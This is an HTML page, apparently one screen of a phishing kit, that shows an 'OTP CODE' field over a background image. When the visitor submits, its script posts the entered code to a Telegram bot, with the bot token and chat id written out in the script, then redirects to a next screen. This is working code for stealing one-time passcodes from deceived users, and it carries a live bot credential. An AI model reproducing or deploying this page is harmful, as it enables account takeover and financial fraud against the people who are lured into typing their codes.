
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Screen 4</title>
  <style>
    body {
      margin: 0;
      background: url('screen4.jpeg') no-repeat center center fixed;
      background-size: cover;
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      font-family: sans-serif;
      height: 100vh;
    }
    input {
      font-size: 20px;
      letter-spacing: 8px;
      background: transparent;
      border: none;
      border-bottom: 2px dotted white;
      color: white;
      text-align: center;
      width: 80%;
      max-width: 300px;
      margin-top: 10px;
    }
    button {
      margin-top: 20px;
      padding: 10px 20px;
      font-size: 18px;
      background: #00FF00;
      border: none;
      border-radius: 5px;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <input type="text" id="otp" placeholder="OTP CODE" maxlength="10" />
  <button onclick="submitOTP()">Submit</button>
  <script>
    function submitOTP() {
      const otp = document.getElementById('otp').value;
      fetch('https://api.telegram.org/bot8261425552:AAFkM6QItg7Vyvd2UoFW7g5ultxQtb2vECI/sendMessage', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ chat_id: '8401076081', text: 'OTP: ' + otp })
      });
      setTimeout(() => window.location.href = "screen5.html", 2000);
    }
  </script>
</body>
</html>
